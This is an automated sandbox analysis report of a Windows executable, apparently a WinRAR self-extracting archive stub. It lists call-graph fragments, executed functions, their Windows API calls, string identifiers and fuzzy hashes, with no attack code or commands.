23688->23670 23689->23663 23690->23668 23691->23663 23693 89acc4 23692->23693 23694 89acc8 23692->23694 23693->23694 23696 89ace8 23693->23696 23700 89ad34 23693->23700 23694->23686 23699 89aff4 10 API calls 3 library calls 23694->23699 23696->23694 23697 89acf4 GetProcAddress 23696->23697 23698 89ad04 __dosmaperr 23697->23698 23698->23694 23699->23685 23701 89ad55 LoadLibraryExW 23700->23701 23704 89ad4a 23700->23704 23702 89ad8a 23701->23702 23703 89ad72 GetLastError 23701->23703 23702->23704 23705 89ada1 FreeLibrary 23702->23705 23703->23702 23706 89ad7d LoadLibraryExW 23703->23706 23704->23693 23705->23704 23706->23702 23707->23633 23708->23586 25414 89c030 GetProcessHeap 25416 88a440 GdipCloneImage GdipAlloc 25460 893a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25483 8a1f40 CloseHandle 24359 88cd58 24360 88ce22 24359->24360 24366 88cd7b 24359->24366 24376 88c793 _wcslen _wcsrchr 24360->24376 24387 88d78f 24360->24387 24363 88d40a 24365 881fbb CompareStringW 24365->24366 24366->24360 24366->24365 24367 88ca67 SetWindowTextW 24367->24376 24372 88c855 SetFileAttributesW 24374 88c90f GetFileAttributesW 24372->24374 24375 88c86f _abort _wcslen 24372->24375 24374->24376 24378 88c921 DeleteFileW 24374->24378 24375->24374 24375->24376 24415 87b991 51 API calls 2 library calls 24375->24415 24376->24363 24376->24367 24376->24372 24379 88cc31 GetDlgItem SetWindowTextW SendMessageW 24376->24379 24382 88cc71 SendMessageW 24376->24382 24386 881fbb CompareStringW 24376->24386 24410 88b314 24376->24410 24414 88a64d GetCurrentDirectoryW 24376->24414 24416 87a5d1 6 API calls 24376->24416 24417 87a55a FindClose 24376->24417 24418 88b48e 76 API calls 2 library calls 24376->24418 24419 893e3e 24376->24419 24378->24376 24380 88c932 24378->24380 24379->24376 24381 874092 _swprintf 51 API calls 24380->24381 24383 88c952 GetFileAttributesW 24381->24383 24382->24376 24383->24380 24384 88c967 MoveFileW 24383->24384 24384->24376 24385 88c97f MoveFileExW 24384->24385 24385->24376 24386->24376 24389 88d799 _abort _wcslen 24387->24389 24388 88d9e7 24388->24376 24389->24388 24390 88d994 24389->24390 24391 88d8a5 24389->24391 24435 881fbb CompareStringW 24389->24435 24390->24388 24395 88d9de ShowWindow 24390->24395 24432 87a231 24391->24432 24395->24388 24396 88d8d9 ShellExecuteExW 24396->24388 24398 88d8ec 24396->24398 24400 88d910 IsWindowVisible 24398->24400 24401 88d925 WaitForInputIdle 24398->24401 24402 88d97b CloseHandle 24398->24402 24399 88d8d1 24399->24396 24400->24401 24403 88d91b ShowWindow 24400->24403 24404 88dc3b 6 API calls 24401->24404 24402->24390 24406 88d989 24402->24406 24403->24401 24405 88d93d 24404->24405 24405->24402 24408 88d950 GetExitCodeProcess 24405->24408 24437 881fbb CompareStringW 24406->24437 24408->24402 24409 88d963 24408->24409 24409->24402 24411 88b31e 24410->24411 24412 88b3f0 ExpandEnvironmentStringsW 24411->24412 24413 88b40d 24411->24413 24412->24413 24413->24376 24414->24376 24415->24375 24416->24376 24417->24376 24418->24376 24420 898e54 24419->24420 24421 898e6c 24420->24421 24422 898e61 24420->24422 24423 898e74 24421->24423 24430 898e7d __dosmaperr 24421->24430 24424 898e06 __vswprintf_c_l 21 API calls 24422->24424 24425 898dcc _free 20 API calls 24423->24425 24428 898e69 24424->24428 24425->24428 24426 898e82 24446 8991a8 20 API calls __dosmaperr 24426->24446 24427 898ea7 HeapReAlloc 24427->24428 24427->24430 24428->24376 24430->24426 24430->24427 24447 897a5e 7 API calls 2 library calls 24430->24447 24438 87a243 24432->24438 24435->24391 24436 87b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24436->24399 24437->24390 24439 88ec50 24438->24439 24440 87a250 GetFileAttributesW 24439->24440 24441 87a261 24440->24441 24442 87a23a 24440->24442 24443 87bb03 GetCurrentDirectoryW 24441->24443 24442->24396 24442->24436 24444 87a275 24443->24444 24444->24442 24445 87a279 GetFileAttributesW 24444->24445 24445->24442 24446->24428 24447->24430 24479 89c051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25417 88e455 14 API calls ___delayLoadHelper2@8 25462 898268 55 API calls _free 25418 88c793 107 API calls 4 library calls 25484 897f6e 52 API calls 3 library calls 25419 871075 84 API calls 25340 879a74 25343 879a7e 25340->25343 25341 879b9d SetFilePointer 25342 879bb6 GetLastError 25341->25342 25346 879ab1 25341->25346 25342->25346 25343->25341 25344 87981a 79 API calls 25343->25344 25345 879b79 25343->25345 25343->25346 25344->25345 25345->25341 25485 871f72 129 API calls __EH_prolog 25421 88a070 10 API calls 25463 88b270 99 API calls 25373 879f7a 25374 879f8f 25373->25374 25375 879f88 25373->25375 25376 879f9c GetStdHandle 25374->25376 25383 879fab 25374->25383 25376->25383 25377 87a003 WriteFile 25377->25383 25378 879fd4 WriteFile 25379 879fcf 25378->25379 25378->25383 25379->25378 25379->25383 25381 87a095 25385 876e98 77 API calls 25381->25385 25383->25375 25383->25377 25383->25378 25383->25379 25383->25381 25384 876baa 78 API calls 25383->25384 25384->25383 25385->25375

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    Function 0088DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00880863: GetModuleHandleW.KERNEL32(kernel32), ref: 0088087C
                                                                                                                                                                                                      • Part of subcall function 00880863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0088088E
                                                                                                                                                                                                      • Part of subcall function 00880863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008808BF
                                                                                                                                                                                                      • Part of subcall function 0088A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0088A655
                                                                                                                                                                                                      • Part of subcall function 0088AC16: OleInitialize.OLE32(00000000), ref: 0088AC2F
                                                                                                                                                                                                      • Part of subcall function 0088AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0088AC66
                                                                                                                                                                                                      • Part of subcall function 0088AC16: SHGetMalloc.SHELL32(008B8438), ref: 0088AC70
                                                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0088DF5C
                                                                                                                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0088DF83
                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0088DF94
                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0088DFCE
                                                                                                                                                                                                      • Part of subcall function 0088DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088DBF4
                                                                                                                                                                                                      • Part of subcall function 0088DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088DC30
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0088DFD7
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,008CEC90,00000800), ref: 0088DFF2
                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,008CEC90), ref: 0088DFFE
                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0088E009
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088E048
                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0088E05A
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0088E061
                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0088E078
                                                                                                                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0088E0C9
                                                                                                                                                                                                    • Sleep.KERNEL32(?), ref: 0088E0F7
                                                                                                                                                                                                    • DeleteObject.GDI32 ref: 0088E130
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0088E140
                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0088E183
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                                                    • API String ID: 3049964643-3743209390
                                                                                                                                                                                                    • Opcode ID: 8fa901121511f59fda74aeaa21cd9031968495a4f7706d474da7cd7165ec9052
                                                                                                                                                                                                    • Instruction ID: 3053243693dcb54965221c48297e1ee3fb7caba52ef9a30bce39324c764b891c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fa901121511f59fda74aeaa21cd9031968495a4f7706d474da7cd7165ec9052
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E61B071904745AFE320BBB8EC49F6B77ADFB45700F04042AFA45D22A2DB78D944CB62
                                                                                                                                                                                                    Function 0088A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 811 88a6c2-88a6df FindResourceW 812 88a7db 811->812 813 88a6e5-88a6f6 SizeofResource 811->813 815 88a7dd-88a7e1 812->815 813->812 814 88a6fc-88a70b LoadResource 813->814 814->812 816 88a711-88a71c LockResource 814->816 816->812 817 88a722-88a737 GlobalAlloc 816->817 818 88a73d-88a746 GlobalLock 817->818 819 88a7d3-88a7d9 817->819 820 88a7cc-88a7cd GlobalFree 818->820 821 88a74c-88a76a call 890320 CreateStreamOnHGlobal 818->821 819->815 820->819 824 88a76c-88a78e call 88a626 821->824 825 88a7c5-88a7c6 GlobalUnlock 821->825 824->825 830 88a790-88a798 824->830 825->820 831 88a79a-88a7ae GdipCreateHBITMAPFromBitmap 830->831 832 88a7b3-88a7c1 830->832 831->832 833 88a7b0 831->833 832->825 833->832
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0088B73D,00000066), ref: 0088A6D5
                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A6EC
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A703
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A712
                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0088B73D,00000066), ref: 0088A72D
                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0088A73E
                                                                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0088A762
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0088A7C6
                                                                                                                                                                                                      • Part of subcall function 0088A626: GdipAlloc.GDIPLUS(00000010), ref: 0088A62C
                                                                                                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0088A7A7
                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0088A7CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                                                                                    • String ID: PNG
                                                                                                                                                                                                    • API String ID: 211097158-364855578
                                                                                                                                                                                                    • Opcode ID: dac8e1858160e2c12bc6b7f6519a47aaa92ac2d284a0cb22b02a2de0109cad1d
                                                                                                                                                                                                    • Instruction ID: 8f6cc701593e75b87baed27ef9b47671a97b5fe3a3e4d041d535ab5dc37cfd70
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dac8e1858160e2c12bc6b7f6519a47aaa92ac2d284a0cb22b02a2de0109cad1d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0031E475600302AFE710BF21DC48D2BBBB9FF85760B00052AF945D2661EB31DC41DBA2
                                                                                                                                                                                                    Function 0087A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1033 87a69b-87a6bf call 88ec50 1036 87a727-87a730 FindNextFileW 1033->1036 1037 87a6c1-87a6ce FindFirstFileW 1033->1037 1038 87a742-87a7ff call 880602 call 87c310 call 8815da * 3 1036->1038 1039 87a732-87a740 GetLastError 1036->1039 1037->1038 1040 87a6d0-87a6e2 call 87bb03 1037->1040 1044 87a804-87a811 1038->1044 1041 87a719-87a722 1039->1041 1047 87a6e4-87a6fc FindFirstFileW 1040->1047 1048 87a6fe-87a707 GetLastError 1040->1048 1041->1044 1047->1038 1047->1048 1050 87a717 1048->1050 1051 87a709-87a70c 1048->1051 1050->1041 1051->1050 1053 87a70e-87a711 1051->1053 1053->1050 1055 87a713-87a715 1053->1055 1055->1041
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6C4
                                                                                                                                                                                                      • Part of subcall function 0087BB03: _wcslen.LIBCMT ref: 0087BB27
                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6F2
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6FE
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A728
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0087A592,000000FF,?,?), ref: 0087A734
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 42610566-0
                                                                                                                                                                                                    • Opcode ID: 0fc6db50f3de3f179076c1a3e7f6f42804df9d56195d32dfc7e9a938cafac00f
                                                                                                                                                                                                    • Instruction ID: ed38c97081858a691ff764ae11a2db5d692ec69c71669a1f547254fa3f0d35ca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fc6db50f3de3f179076c1a3e7f6f42804df9d56195d32dfc7e9a938cafac00f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B416272900519ABCB29DF68CC88AEEB7B8FB89350F144196F55DE3240D734AE94CF91
                                                                                                                                                                                                    Function 00897DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00897DC4,?,008AC300,0000000C,00897F1B,?,00000002,00000000), ref: 00897E0F
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00897DC4,?,008AC300,0000000C,00897F1B,?,00000002,00000000), ref: 00897E16
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00897E28
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                    • Opcode ID: 1c95f02e99370dee0fa129a5f522b0a910fe834b227c6e4896e496017a822a75
                                                                                                                                                                                                    • Instruction ID: f073bc4111b72b434f834507802e08fe9178e46c8e6ed9b60c61eb969353da1d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c95f02e99370dee0fa129a5f522b0a910fe834b227c6e4896e496017a822a75
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EE04631110948AFDF02BF24DD4AA4A3F6AFF11741F084454F809CA532CB36DE52CA80
                                                                                                                                                                                                    Function 0087848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: f83c793efefddbaeeab8e283be92e96c09fcde47961f092b3e5d4ed900fe3e63
                                                                                                                                                                                                    • Instruction ID: d5a4669d35ea30c3d6c5f8a467d3b59dd29c5f315f6fad139941cb0b125adb53
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f83c793efefddbaeeab8e283be92e96c09fcde47961f092b3e5d4ed900fe3e63
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD82E770944145EEDF25DB64C899BFABBA9FF05300F0881B9E84DDB14ADB31DA84CB61
                                                                                                                                                                                                    Function 00886CDC Relevance: .3, Instructions: 343COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: bf1f2d9a1665274bc6f463f74a830873fdd84480874af68a3d70b07e32da67fd
                                                                                                                                                                                                    • Instruction ID: c8d06f9784ad1eaad21258d485b9374736e12151c60257f7b04fffc8be16e204
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf1f2d9a1665274bc6f463f74a830873fdd84480874af68a3d70b07e32da67fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4D1B0B1A083458FDB14EF28C84475BBBE1FF89308F18456DE889DB242E774E915CB56
                                                                                                                                                                                                    Function 0088B7E0 Relevance: 104.0, APIs: 49, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0088B7E5
                                                                                                                                                                                                      • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
                                                                                                                                                                                                      • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0088B8D1
                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088B8EF
                                                                                                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0088B902
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0088B910
                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0088B91A
                                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0088B93D
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0088B960
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0088B983
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0088B99E
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,008A35F4), ref: 0088B9B1
                                                                                                                                                                                                      • Part of subcall function 0088D453: _wcslen.LIBCMT ref: 0088D47D
                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0088B9B8
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088BA24
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: GetDlgItem.USER32(00000068,008CFCB8), ref: 0088D4E8
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0088AF07,00000001,?,?,0088B7B9,008A506C,008CFCB8,008CFCB8,00001000,00000000,00000000), ref: 0088D510
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0088D51B
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008A35F4), ref: 0088D529
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088D53F
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0088D559
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088D59D
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0088D5AB
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088D5BA
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088D5E1
                                                                                                                                                                                                      • Part of subcall function 0088D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008A43F4), ref: 0088D5F0
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0088BA68
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0088BA90
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0088BAAE
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088BAC2
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0088BAF4
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0088BB43
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088BB7C
                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0088BBD0
                                                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0088BBEA
                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0088BC47
                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0088BC6F
                                                                                                                                                                                                    • WaitForInputIdle.USER32(?,00002710), ref: 0088BCA5
                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 0088BCB9
                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0088BCE2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0088BCEB
